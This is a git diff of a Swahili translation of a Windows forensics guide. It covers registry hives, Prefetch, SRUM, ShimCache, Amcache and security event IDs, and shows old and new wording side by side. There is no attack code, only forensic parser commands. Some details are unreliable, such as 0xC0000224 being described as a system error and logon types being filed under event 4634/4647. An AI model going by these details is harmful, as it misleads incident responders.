* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Tena, ina GUI inayoruhusu kutembea kupitia usajili uliopakiwa na pia ina programu-jalizi zinazoonyesha habari muhimu ndani ya usajili uliopakiwa.
|
||||
* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Programu nyingine ya GUI inayoweza kutoa habari muhimu kutoka kwa usajili uliopakiwa.
|
||||
|
||||
### Kurejesha Kipengele Kilichofutwa
|
||||
|
||||
Wakati funguo inafutwa, inaashiria hivyo, lakini mpaka nafasi inayochukuliwa inahitajika, haitaondolewa. Kwa hivyo, kwa kutumia zana kama **Mchunguzi wa Usajili**, ni inawezekana kurejesha funguo hizi zilizofutwa.
|
||||
Wakati funguo inafutwa, inaashiria hivyo, lakini mpaka nafasi inayochukua inahitajika, haitaondolewa. Kwa hivyo, kutumia zana kama **Mchunguzi wa Usajili** inawezekana kurejesha funguo hizi zilizofutwa.
|
||||
|
||||
### Wakati wa Kuandika Mwisho
|
||||
### Muda wa Mwisho wa Kuandika
|
||||
|
||||
Kila Funguo-Kitu kina **muda** unaonyesha wakati uliopita ulibadilishwa.
|
||||
Kila Funguo-Kitu kina **muda** unaonyesha wakati wa mwisho uliobadilishwa.
|
||||
|
||||
### SAM
|
||||
|
||||
Faili/hive ya **SAM** ina **watumiaji, vikundi na nywila za watumiaji** za mfumo.
|
||||
|
||||
Katika `SAM\Domains\Account\Users` unaweza kupata jina la mtumiaji, RID, kuingia mwisho, kuingia kushindwa mwisho, hesabu ya kuingia, sera ya nywila na wakati akaunti iliumbwa. Ili kupata **nywila** unahitaji pia faili/hive ya **SYSTEM**.
|
||||
Katika `SAM\Domains\Account\Users` unaweza kupata jina la mtumiaji, RID, kuingia mwisho, kuingia kushindwa mwisho, kuhesabu kuingia, sera ya nywila na wakati akaunti ilianzishwa. Ili kupata **nywila** unahitaji pia faili/hive ya **SYSTEM**.
|
||||
|
||||
### Vitambulisho Vinavyovutia katika Usajili wa Windows
|
||||
### Viingilio Vyenye Kuvutia katika Usajili wa Windows
|
||||
|
||||
{% content-ref url="interesting-windows-registry-keys.md" %}
|
||||
[interesting-windows-registry-keys.md](interesting-windows-registry-keys.md)
|
||||
|
@ -280,25 +286,25 @@ Katika `SAM\Domains\Account\Users` unaweza kupata jina la mtumiaji, RID, kuingia
|
|||
|
||||
### Mchakato wa Msingi wa Windows
|
||||
|
||||
Katika [chapisho hili](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) unaweza kujifunza kuhusu michakato ya kawaida ya Windows ili kugundua tabia za shaka.
|
||||
Katika [chapisho hili](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) unaweza kujifunza kuhusu mchakato wa kawaida wa Windows ili kugundua tabia za shaka.
|
||||
|
||||
### Programu Zilizotekelezwa Hivi Karibuni za Windows
|
||||
### Programu za Hivi Karibuni za Windows
|
||||
|
||||
Ndani ya usajili wa `NTUSER.DAT` katika njia `Software\Microsoft\Current Version\Search\RecentApps` unaweza kupata funguo za ziada na habari kuhusu **programu iliyotekelezwa**, **wakati wa mwisho** iliyotekelezwa, na **idadi ya mara** iliyozinduliwa.
|
||||
Ndani ya usajili wa `NTUSER.DAT` katika njia `Software\Microsoft\Current Version\Search\RecentApps` unaweza kupata funguo za ziada na habari kuhusu **programu iliyotekelezwa**, **wakati wa mwisho** ilitekelezwa, na **idadi ya mara** iliyozinduliwa.
|
||||
|
||||
### BAM (Background Activity Moderator)
|
||||
### BAM (Msimamizi wa Shughuli za Nyuma)
|
||||
|
||||
Unaweza kufungua faili ya `SYSTEM` na mhariri wa usajili na ndani ya njia `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` unaweza kupata habari kuhusu **programu zilizotekelezwa na kila mtumiaji** (zingatia `{SID}` katika njia) na **wakati gani** zilitekelezwa (wakati uko ndani ya thamani ya Data ya usajili).
|
||||
Unaweza kufungua faili ya `SYSTEM` na mhariri wa usajili na ndani ya njia `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` unaweza kupata habari kuhusu **programu zilizotekelezwa na kila mtumiaji** (kumbuka `{SID}` katika njia) na **wakati** walitekelezwa (wakati uko ndani ya thamani ya data ya usajili).
|
||||
|
||||
### Windows Prefetch
|
||||
|
||||
Prefetching ni mbinu inayoruhusu kompyuta kupata kimya-kimya **rasilimali zinazohitajika ili kuonyesha yaliyomo** ambayo mtumiaji **anaweza kufikia hivi karibuni** ili rasilimali ziweze kupatikana haraka.
|
||||
Prefetching ni mbinu inayoruhusu kompyuta kupakua kimya-kimya **rasilimali zinazohitajika kuonyesha maudhui** ambayo mtumiaji **anaweza kupata karibu siku zijazo** ili rasilimali ziweze kupatikana haraka.
|
||||
|
||||
Windows prefetch inajumuisha kuunda **hifadhi za programu zilizotekelezwa** ili ziweze kupakia haraka. Hifadhi hizi zinaundwa kama faili za `.pf` katika njia: `C:\Windows\Prefetch`. Kuna kikomo cha faili 128 katika XP/VISTA/WIN7 na faili 1024 katika Win8/Win10.
|
||||
Windows prefetch inajumuisha kuunda **hifadhi za programu zilizotekelezwa** ili ziweze kupakia haraka. Hifadhi hizi zinaundwa kama faili za `.pf` ndani ya njia: `C:\Windows\Prefetch`. Kuna kikomo cha faili 128 katika XP/VISTA/WIN7 na faili 1024 katika Win8/Win10.
|
||||
|
||||
Jina la faili linaundwa kama `{jina_la_programu}-{hash}.pf` (hash inategemea njia na hoja za kutekelezwa). Katika W10 faili hizi zimefupishwa. Tafadhali kumbuka kuwa uwepo wa faili pekee unaonyesha kwamba **programu ilitekelezwa** wakati fulani.
|
||||
Jina la faili linaundwa kama `{jina_la_programu}-{hash}.pf` (hash inategemea njia na hoja za programu). Katika W10 faili hizi zimepakwa. Tafadhali kumbuka kuwa uwepo wa faili pekee unaonyesha kwamba **programu ilitekelezwa** wakati fulani.
|
||||
|
||||
Faili ya `C:\Windows\Prefetch\Layout.ini` ina **majina ya saraka za faili zilizopakuliwa mapema**. Faili hii ina **habari kuhusu idadi ya utekelezaji**, **tarehe** za utekelezaji, na **faili** **zilizofunguliwa** na programu.
|
||||
Faili ya `C:\Windows\Prefetch\Layout.ini` ina **majina ya saraka za faili zilizopakuliwa mapema**. Faili hii ina **habari kuhusu idadi ya utekelezaji**, **tarehe** za utekelezaji na **faili** **zilizofunguliwa** na programu.
|
||||
|
||||
Kutazama faili hizi unaweza kutumia zana [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
|
||||
```bash
|
||||
|
@ -308,168 +314,192 @@ Kutazama faili hizi unaweza kutumia zana [**PEcmd.exe**](https://github.com/Eric
|
|||
|
||||
### Superprefetch
|
||||
|
||||
**Superprefetch** ina lengo kama prefetch, **kuwezesha programu kufunguka haraka** kwa kutabiri ni programu gani itakayofunguliwa baadaye. Hata hivyo, haitoi huduma ya prefetch.\
|
||||
**Superprefetch** ina lengo kama prefetch, **kuwezesha programu kupakia haraka** kwa kutabiri ni nini kitakachopakiwa baadaye. Hata hivyo, haitoi huduma ya prefetch.\
|
||||
Huduma hii itazalisha faili za database katika `C:\Windows\Prefetch\Ag*.db`.
|
||||
|
||||
Katika hizi database unaweza kupata **jina** la **programu**, **idadi** ya **utekelezaji**, **faili** **zilizofunguliwa**, **kiasi** **cha ufikivu**, **njia kamili**, **muda** na **muda wa alama**.
|
||||
Katika hizi database unaweza kupata **jina** la **programu**, **idadi** ya **utekelezaji**, **faili** **zilizofunguliwa**, **upatikanaji** wa **kiasi**, **njia kamili**, **muda** na **muda wa alama**.
|
||||
|
||||
Unaweza kupata habari hii kwa kutumia zana [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
|
||||
|
||||
### SRUM
|
||||
|
||||
**System Resource Usage Monitor** (SRUM) **inachunguza** **rasilimali** **zilizotumiwa** **na mchakato**. Ilianza katika W8 na hifadhi data katika database ya ESE iliyo katika `C:\Windows\System32\sru\SRUDB.dat`.
|
||||
**System Resource Usage Monitor** (SRUM) **inachunguza** **rasilimali** **zilizotumiwa** **na mchakato**. Ilianza katika W8 na hifadhi data katika database ya ESE iliyoko `C:\Windows\System32\sru\SRUDB.dat`.
|
||||
|
||||
Inatoa habari ifuatayo:
|
||||
|
||||
* AppID na Njia
|
||||
* Mtumiaji aliyetekeleza mchakato
|
||||
* Herufi zilizotumwa
|
||||
* Herufi zilizopokelewa
|
||||
* Kiolesura cha Mtandao
|
||||
* Muda wa uhusiano
|
||||
* Muda wa mchakato
|
||||
* Bytes Zilizotumwa
|
||||
* Bytes Zilizopokelewa
|
||||
* Interface ya Mtandao
|
||||
* Muda wa Uunganisho
|
||||
* Muda wa Mchakato
|
||||
|
||||
Habari hii inasasishwa kila baada ya dakika 60.
|
||||
Habari hii hupitiwa kila baada ya dakika 60.
|
||||
|
||||
Unaweza kupata data kutoka kwenye faili hii kwa kutumia zana [**srum\_dump**](https://github.com/MarkBaggett/srum-dump).
|
||||
Unaweza kupata data kutoka faili hii kwa kutumia zana [**srum\_dump**](https://github.com/MarkBaggett/srum-dump).
|
||||
```bash
|
||||
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
|
||||
```
|
||||
### AppCompatCache (ShimCache)
|
||||
|
||||
**AppCompatCache**, inayojulikana pia kama **ShimCache**, ni sehemu ya **Application Compatibility Database** iliyoendelezwa na **Microsoft** kushughulikia matatizo ya utangamano wa programu. Sehemu hii ya mfumo inarekodi vipande mbalimbali vya metadata ya faili, ambavyo ni pamoja na:
|
||||
**AppCompatCache**, inayojulikana pia kama **ShimCache**, ni sehemu ya **Application Compatibility Database** iliyoendelezwa na **Microsoft** kushughulikia matatizo ya utangamano wa programu. Kipengele hiki cha mfumo hurekodi vipande mbalimbali vya metadata ya faili, ambavyo ni pamoja na:
|
||||
|
||||
- Njia kamili ya faili
|
||||
- Ukubwa wa faili
|
||||
- Wakati wa Mwisho wa Kubadilishwa chini ya **$Standard\_Information** (SI)
|
||||
- Wakati wa Mwisho wa Kuboreshwa wa ShimCache
|
||||
- Muda wa Mwisho wa Kubadilishwa chini ya **$Standard\_Information** (SI)
|
||||
- Muda wa Mwisho wa Kusasishwa wa ShimCache
|
||||
- Bendera ya Utekelezaji wa Mchakato
|
||||
|
||||
Data kama hiyo imehifadhiwa ndani ya usajili katika maeneo maalum kulingana na toleo la mfumo wa uendeshaji:
|
||||
Data kama hiyo hifadhiwa ndani ya usajili katika maeneo maalum kulingana na toleo la mfumo wa uendeshaji:
|
||||
|
||||
- Kwa XP, data imehifadhiwa chini ya `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` na uwezo wa kuingiza vitu 96.
|
||||
- Kwa Server 2003, pamoja na toleo la Windows 2008, 2012, 2016, 7, 8, na 10, njia ya uhifadhi ni `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, ikiruhusu vitu 512 na 1024 mtawaliwa.
|
||||
- Kwa XP, data hifadhiwa chini ya `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` na uwezo wa kuingiza vipengele 96.
|
||||
- Kwa Server 2003, pamoja na toleo za Windows 2008, 2012, 2016, 7, 8, na 10, njia ya kuhifadhi ni `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, ikiruhusu kuingiza vipengele 512 na 1024, mtawalia.
|
||||
|
||||
Ili kuchambua habari iliyohifadhiwa, inapendekezwa kutumia zana ya [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser).
|
||||
Kutafsiri habari iliyohifadhiwa, zana ya [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser) inapendekezwa kutumika.
|
||||
|
||||
![](<../../../.gitbook/assets/image (488).png>)
|
||||
|
||||
### Amcache
|
||||
|
||||
Faili ya **Amcache.hve** ni msingi wa usajili ambao unaorodhesha maelezo kuhusu programu ambazo zimefanywa kwenye mfumo. Kawaida inapatikana kwenye `C:\Windows\AppCompat\Programas\Amcache.hve`.
|
||||
Faili ya **Amcache.hve** ni msingi wa usajili unaorekodi maelezo kuhusu programu zilizotekelezwa kwenye mfumo. Kawaida hupatikana kwenye `C:\Windows\AppCompat\Programas\Amcache.hve`.
|
||||
|
||||
Faili hii inajulikana kwa kuhifadhi rekodi za michakato iliyotekelezwa hivi karibuni, ikiwa ni pamoja na njia za faili za kutekelezwa na hashi zao za SHA1. Habari hii ni muhimu kwa kufuatilia shughuli za programu kwenye mfumo.
|
||||
Faili hii inajulikana kwa kuhifadhi rekodi za michakato iliyotekelezwa hivi karibuni, ikiwa ni pamoja na njia za faili za kutekelezeka na hash zao za SHA1. Taarifa hii ni muhimu kwa kufuatilia shughuli za programu kwenye mfumo.
|
||||
|
||||
Ili kuchambua na kuchanganua data kutoka kwenye faili ya **Amcache.hve**, unaweza kutumia zana ya [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser). Amri ifuatayo ni mfano wa jinsi ya kutumia AmcacheParser kuchambua maudhui ya faili ya **Amcache.hve** na kutoa matokeo katika muundo wa CSV:
|
||||
Kutolea nje na kuchambua data kutoka kwa **Amcache.hve**, zana ya [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) inaweza kutumika. Amri ifuatayo ni mfano wa jinsi ya kutumia AmcacheParser kutafsiri maudhui ya faili ya **Amcache.hve** na kutoa matokeo kwa muundo wa CSV:
|
||||
```bash
|
||||
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
|
||||
```
|
||||
Miongoni mwa faili za CSV zilizozalishwa, `Amcache_Unassociated file entries` ni muhimu sana kwa sababu inatoa habari kamili kuhusu faili zisizohusishwa.
|
||||
Miongoni mwa faili za CSV zilizozalishwa, `Amcache_Unassociated file entries` ni muhimu sana kutokana na habari tajiri inayotoa kuhusu viingilio vya faili visivyo husishwa.
|
||||
|
||||
Faili ya CVS yenye kuvutia zaidi ni `Amcache_Unassociated file entries`.
|
||||
Faili ya CVS yenye kuvutia zaidi iliyozalishwa ni `Amcache_Unassociated file entries`.
|
||||
|
||||
### RecentFileCache
|
||||
|
||||
Kipengele hiki kinaweza kupatikana tu katika W7 kwenye `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` na ina habari kuhusu utekelezaji wa hivi karibuni wa baadhi ya programu.
|
||||
Saraka hii inaweza kupatikana tu katika W7 kwenye `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` na ina habari kuhusu utekelezaji wa hivi karibuni wa baadhi ya binaries.
|
||||
|
||||
Unaweza kutumia zana [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) kuipasua faili.
|
||||
Unaweza kutumia zana [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) kuchambua faili.
|
||||
|
||||
### Kazi zilizopangwa
|
||||
|
||||
Unaweza kuzitoa kutoka `C:\Windows\Tasks` au `C:\Windows\System32\Tasks` na kuzisoma kama XML.
|
||||
Unaweza kuzitoa kutoka `C:\Windows\Tasks` au `C:\Windows\System32\Tasks` na kusoma kama XML.
|
||||
|
||||
### Huduma
|
||||
|
||||
Unaweza kuzipata katika usajili chini ya `SYSTEM\ControlSet001\Services`. Unaweza kuona ni nini kitatekelezwa na lini.
|
||||
Unaweza kuzipata kwenye usajili chini ya `SYSTEM\ControlSet001\Services`. Unaweza kuona nini kitatekelezwa na lini.
|
||||
|
||||
### **Duka la Windows**
|
||||
|
||||
Programu zilizosakinishwa zinaweza kupatikana katika `\ProgramData\Microsoft\Windows\AppRepository\`\
|
||||
Hifadhidata hii ina **logi** na **kila programu iliyosakinishwa** kwenye mfumo ndani ya hifadhidata **`StateRepository-Machine.srd`**.
|
||||
Hifadhi hii ina **logi** na **kila programu iliyosakinishwa** kwenye mfumo ndani ya hifadhidata **`StateRepository-Machine.srd`**.
|
||||
|
||||
Ndani ya jedwali la Programu katika hifadhidata hii, ni sawa kupata safu: "Kitambulisho cha Programu", "Nambari ya Pakiti", na "Jina la Kuonyesha". Safu hizi zina habari kuhusu programu zilizosakinishwa na zinaweza kupatikana ikiwa programu fulani zilifutwa kwa sababu vitambulisho vya programu zilizosakinishwa vinapaswa kuwa vya mfululizo.
|
||||
Ndani ya jedwali la Programu katika hifadhidata hii, ni pamoja na vitengo: "Kitambulisho cha Programu", "Nambari ya Pakiti", na "Jina la Kuonyesha". Vitengo hivi vina habari kuhusu programu zilizosakinishwa awali na zilizosakinishwa na inaweza kupatikana ikiwa baadhi ya programu zilisakinushwa kwa sababu vitambulisho vya programu zilizosakinishwa vinapaswa kuwa vya mfululizo.
|
||||
|
||||
Pia ni sawa kupata **programu iliyosakinishwa** ndani ya njia ya usajili: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
|
||||
Na **programu zilizofutwa** katika: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
|
||||
Pia ni **kupata programu iliyosakinishwa** ndani ya njia ya usajili: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
|
||||
Na **programu zilizosakinushwa** katika: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
|
||||
|
||||
## Matukio ya Windows
|
||||
|
||||
Habari zinazoonekana ndani ya matukio ya Windows ni:
|
||||
Habari inayoonekana ndani ya matukio ya Windows ni:
|
||||
|
||||
* Kilichotokea
|
||||
* Muda (UTC + 0)
|
||||
* Watumiaji waliohusika
|
||||
* Wenyewe waliohusika (jina la mwenyeji, IP)
|
||||
* Mali zilizofikiwa (faili, folda, printer, huduma)
|
||||
* Wenyeji waliohusika (jina la mwenyeji, IP)
|
||||
* Mali zilizopatikana (faili, folda, printa, huduma)
|
||||
|
||||
Magogo yapo katika `C:\Windows\System32\config` kabla ya Windows Vista na katika `C:\Windows\System32\winevt\Logs` baada ya Windows Vista. Kabla ya Windows Vista, magogo ya matukio yalikuwa katika muundo wa binary na baada yake, yako katika muundo wa **XML** na hutumia kifaa cha **.evtx**.
|
||||
Vipakuli viko katika `C:\Windows\System32\config` kabla ya Windows Vista na katika `C:\Windows\System32\winevt\Logs` baada ya Windows Vista. Kabla ya Windows Vista, vipakuli vya matukio vilikuwa katika muundo wa binary na baada yake, wako katika **muundo wa XML** na hutumia kifaa cha **.evtx**.
|
||||
|
||||
Mahali pa faili za matukio yanaweza kupatikana katika usajili wa SYSTEM katika **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
|
||||
Mahali pa faili za matukio zinaweza kupatikana katika usajili wa SYSTEM katika **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
|
||||
|
||||
Yaweza kuonekana kutoka kwenye Tazama Matukio ya Windows (**`eventvwr.msc`**) au kwa kutumia zana nyingine kama [**Event Log Explorer**](https://eventlogxp.com) **au** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
|
||||
Zinaweza kuonekana kutoka kwa Mwangalizi wa Matukio ya Windows (**`eventvwr.msc`**) au kwa zana zingine kama [**Mwangalizi wa Matukio**](https://eventlogxp.com) **au** [**Mwangalizi wa Evtx/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
|
||||
|
||||
## Kuelewa Kumbukumbu za Matukio ya Usalama ya Windows
|
||||
## Kuelewa Kuingiza Matukio ya Usalama ya Windows
|
||||
|
||||
Matukio ya ufikiaji hurekodiwa katika faili ya usanidi wa usalama iliyoko kwenye `C:\Windows\System32\winevt\Security.evtx`. Ukubwa wa faili hii unaweza kubadilishwa, na unapofikia uwezo wake, matukio ya zamani hufutwa. Matukio yaliyorekodiwa ni pamoja na kuingia na kutoka kwa watumiaji, hatua za watumiaji, na mabadiliko ya mipangilio ya usalama, pamoja na ufikiaji wa faili, folda, na mali zilizoshirikiwa.
|
||||
Matukio ya ufikiaji hurekodiwa katika faili ya usanidi wa usalama iliyoko kwenye `C:\Windows\System32\winevt\Security.evtx`. Ukubwa wa faili hii unaweza kurekebishwa, na unapofikia uwezo wake, matukio ya zamani hufutwa. Matukio yaliyorekodiwa ni pamoja na kuingia na kutoka kwa watumiaji, hatua za watumiaji, na mabadiliko kwenye mipangilio ya usalama, pamoja na ufikiaji wa mali kama faili, folda, na mali zilizoshirikiwa.
|
||||
|
||||
### Vitambulisho vya Matukio Muhimu kwa Uthibitishaji wa Mtumiaji:
|
||||
### Vitambulisho muhimu vya Matukio ya Usajili wa Watumiaji:
|
||||
|
||||
- **Tukio la Kitambulisho 4624**: Inaonyesha mtumiaji aliyethibitishwa kwa mafanikio.
|
||||
- **Tukio la Kitambulisho 4625**: Inaonyesha kushindwa kwa uthibitishaji.
|
||||
- **Vitambulisho vya Matukio 4634/4647**: Inawakilisha matukio ya kuingia na kutoka kwa mtumiaji.
|
||||
- **Tukio la Kitambulisho 4672**: Inaonyesha kuingia kwa mtumiaji na mamlaka ya usimamizi.
|
||||
- **Tukio la 4624**: Inaonyesha mafanikio ya kuingia kwa mtumiaji.
|
||||
- **Tukio la 4625**: Inaashiria kushindwa kwa kuingia.
|
||||
- **Matukio ya 4634/4647**: Yanawakilisha matukio ya kutoka kwa mtumiaji.
|
||||
- **Tukio la 4672**: Linabainisha kuingia na mamlaka ya usimamizi.
|
||||
|
||||
#### Aina za ziada ndani ya Tukio la Kitambulisho 4634/4647:
|
||||
#### Aina za Ndani ndani ya Tukio la 4634/4647:
|
||||
|
||||
- **Mwingiliano (2)**: Kuingia moja kwa moja ya mtumiaji.
|
||||
- **Mwingiliano (2)**: Kuingia moja kwa moja kwa mtumiaji.
|
||||
- **Mtandao (3)**: Kufikia folda zilizoshirikiwa.
|
||||
- **Kundi (4)**: Utekelezaji wa michakato ya kundi.
|
||||
- **Batch (4)**: Utekelezaji wa michakato ya batch.
|
||||
- **Huduma (5)**: Kuzindua huduma.
|
||||
- **Mandaraka (6)**: Uthibitishaji wa mandaraka.
|
||||
- **Kufungua (7)**: Kufungua skrini kwa kutumia nenosiri.
|
||||
- **Mtandao wa Wazi (8)**: Uhamisho wa nenosiri wazi, mara nyingi kutoka kwa IIS.
|
||||
- **Vyeti Vipya (9)**: Matumizi ya vitambulisho tofauti kwa ufikiaji.
|
||||
- **Mwingiliano wa Mbali (10)**: Kuingia kwa mbali kwenye desktop au huduma za terminal.
|
||||
- **Mwingiliano wa Akiba (11)**: Kuingia na vitambulisho vya akiba bila mawasiliano na kudhibiti kikoa.
|
||||
- **Mwingiliano wa Mbali wa Akiba (12)**: Kuingia kwa mbali na vitambulisho vya akiba.
|
||||
- **Kufungua kwa Akiba (13)**: Kufungua kwa kutumia vitambulisho vya akiba.
|
||||
- **Mwakilishi (6)**: Uthibitishaji wa mwakilishi.
|
||||
- **Kufungua (7)**: Skrini iliyofunguliwa kwa nenosiri.
|
||||
- **Mtandao wa Wazi (8)**: Uhamishaji wa nenosiri wazi, mara nyingi kutoka kwa IIS.
|
||||
- **Vibali Vipya (9)**: Matumizi ya vibali tofauti kwa ufikiaji.
|
||||
- **Mwingiliano wa Mbali (10)**: Kuingia kwa mbali kwenye dawati au huduma za terminali.
|
||||
- **Mwingiliano wa Akiba (11)**: Kuingia na vibali vilivyohifadhiwa bila mawasiliano na kituo cha upelekaji wa kikoa.
|
||||
- **Mwingiliano wa Mbali wa Akiba (12)**: Kuingia kwa mbali na vibali vilivyohifadhiwa.
|
||||
- **Kufungua kwa Akiba (13)**: Kufungua kwa vibali vilivyohifadhiwa.
|
||||
|
||||
#### Vyeti vya Hali na Hali za Ziada kwa Tukio la Kitambulisho 4625:
|
||||
#### Vigezo vya Hali na Hali za Ndani kwa Tukio la 4625:
|
||||
|
||||
- **0xC0000064**: Jina la mtumiaji halipo - Inaweza kuashiria shambulio la uchunguzi wa majina ya watumiaji.
|
||||
- **0xC000006A**: Jina sahihi la mtumiaji lakini nenosiri sio sahihi - Inaweza kuwa jaribio la kuhesabu au kuvunja nenosiri.
|
||||
- **0xC0000234**: Akaunti ya mtumiaji imefungwa - Inaweza kufuata shambulio la kuhesabu kwa kuingia mara nyingi kwa kushindwa.
|
||||
- **0xC0000072**: Akaunti imelemazwa - Jaribio lisiloruhusiwa la kufikia akaunti zilizolemazwa.
|
||||
- **0xC000006F**: Kuingia nje ya muda ulioruhusiwa - Inaonyesha jaribio la kufikia nje ya masaa ya kuingia yaliyowekwa, inaweza kuwa ishara ya ufikiaji usioruhusiwa.
|
||||
- **0xC000006A**: Jina sahihi la mtumiaji lakini nenosiri lisilo sahihi - Jaribio la kudhanisha au kujaribu kuvunja nenosiri.
|
||||
- **0xC0000234**: Akaunti ya mtumiaji imefungwa - Inaweza kufuata shambulio la kujaribu kuvunja nenosiri na kusababisha kuingia mara nyingi isiyofanikiwa.
|
||||
- **0xC0000072**: Akaunti imelemazwa - Jaribio lisiloruhusiwa la kupata akaunti zilizolemazwa.
|
||||
- **0xC000006F**: Kuingia nje ya muda ulioruhusiwa - Inaonyesha jaribio la kupata nje ya masaa ya kuingia yaliyowekwa, ishara inayoweza kuashiria ufikiaji usioruhusiwa.
|
||||
- **0xC0000070**: Ukiukaji wa vikwazo vya kituo cha kazi - Inaweza kuwa jaribio la kuingia kutoka eneo lisiloruhusiwa.
|
||||
- **0xC0000193**: Akaunti imeisha muda wake - Jaribio la kufikia akaunti za watumiaji zilizopita muda wake.
|
||||
- **0xC0000193**: Akaunti imeisha muda wake - Jaribio la kupata na akaunti za watumiaji zilizomaliza muda.
|
||||
- **0xC0000071**: Nenosiri limeisha muda wake - Jaribio la kuingia na nywila zilizopitwa na wakati.
|
||||
- **0xC0000133**: Matatizo ya usawazishaji wa muda - Tofauti kubwa ya muda kati ya mteja na seva inaweza kuwa ishara ya mashambulizi ya hali ya juu kama vile pass-the-ticket.
|
||||
- **0xC0000224**: Inahitajika mabadiliko ya lazima ya nenosiri - Mabadiliko ya mara kwa mara ya lazima yanaweza kuashiria jaribio la kudhoofisha usalama wa akaunti.
|
||||
- **0xC0000225**: Inaonyesha hitilafu ya mfumo badala ya shida ya usalama.
|
||||
- **0xC000015b**: Amezuiliwa aina ya kuingia - Jaribio la kufikia na aina ya kuingia isiyoruhusiwa, kama mtumiaji anayejaribu kutekeleza kuingia kwa huduma.
|
||||
- **0xC0000133**: Matatizo ya usawazishaji wa muda - Tofauti kubwa za muda kati ya mteja na seva zinaweza kuwa ishara ya mashambulizi ya hali ya juu kama vile pass-the-ticket.
|
||||
- **0xC0000224**: Inahusu hitilafu ya mfumo badala ya suala la usalama.
|
||||
- **0xC0000225**: Inaonyesha hitilafu ya mfumo badala ya suala la usalama.
|
||||
- **0xC000015b**: Amezuiliwa aina ya kuingia - Jaribio la kupata na aina isiyoruhusiwa ya kuingia, kama mtumiaji anayejaribu kutekeleza kuingia kwa huduma.
|
||||
|
||||
#### Tukio la Kitambulisho 4616:
|
||||
- **Mabadiliko ya Muda**: Kubadilisha muda wa mfumo, inaweza kuficha mfululizo wa
|
||||
#### Tukio la 4616:
|
||||
- **Mabadiliko ya Muda**: Kubadilisha muda wa mfumo, inaweza kuficha mstari wa matukio.
|
||||
|
||||
#### Tukio la 6005 na 6006:
|
||||
- **Kuanza na Kuzima kwa Mfumo**: Tukio la 6005 linaonyesha kuanza kwa mfumo, wakati Tukio la 6006 linamaanisha kuzimwa kwake.
|
||||
|
||||
#### Tukio la 1102:
|
||||
- **Kufuta Kumbukumbu**: Kufuta kumbukumbu za usalama, ambayo mara nyingi ni ishara ya kuficha shughuli haramu.
|
||||
|
||||
#### Matukio kwa Kufuatilia Kifaa cha USB:
|
||||
- **20001 / 20003 / 10000**: Uunganisho wa kifaa cha USB mara ya kwanza.
|
||||
- **10100**: Sasisho la dereva la USB.
|
||||
- **Tukio la 112**: Wakati wa kuingiza kifaa cha USB.
|
||||
|
||||
Kwa mifano ya vitendo kuhusu kusimuliza aina hizi za kuingia na fursa za kudondosha vibali, tazama [mwongozo kamili wa Altered Security](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
|
||||
|
||||
Maelezo ya matukio, ikiwa ni pamoja na vigezo vya hali na hali za ndani, hutoa ufahamu zaidi kuhusu sababu za matukio, hasa yanayojulikana katika Tukio la 4625.
|
||||
|
||||
### Kurejesha Matukio ya Windows
|
||||
|
||||
Ili kuongeza nafasi za kurejesha Matukio ya Windows yaliyofutwa, ni vyema kuzima kompyuta ya shaka kwa kuzima moja kwa moja. **Bulk_extractor**, zana ya kurejesha ikilenga kifaa cha `.evtx`, inapendekezwa kujaribu kurejesha matukio kama hayo.
|
||||
|
||||
### Kutambua Mashambulizi ya Kawaida kupitia Matukio ya Windows
|
||||
|
||||
Kwa mwongozo kamili wa kutumia Vitambulisho vya Matukio ya Windows kutambua mashambulizi ya mtandao ya kawaida, tembelea [Red Team Recipe](https://redteamrecipe.com/event-codes/).
|
||||
|
||||
#### Mashambulizi ya Kuvunja Nguvu
|
||||
|
||||
Yanaweza kutambulika na rekodi nyingi za Tukio la 4625, ikifuatiwa na Tukio la 4624 ikiwa shambulio linafanikiwa.
|
||||
|
||||
#### Mabadiliko ya Muda
|
||||
|
||||
Yaliyorekodiwa na Tukio la 4616, mabadiliko ya muda wa mfumo yanaweza kufanya uchambuzi wa kiforensiki kuwa mgumu.
|
||||
|
||||
#### Kufuatilia Kifaa cha USB
|
||||
|
||||
Matukio muhimu ya Mfumo kwa kufuatilia kifaa cha USB ni pamoja na 20001/20003/10000 kwa matumizi ya kwanza, 10100 kwa sasisho za dereva, na Tukio la 112 kutoka kwa DeviceSetupManager kwa alama za wakati wa kuingiza.
|
||||
#### Matukio ya Nguvu ya Mfumo
|
||||
|
||||
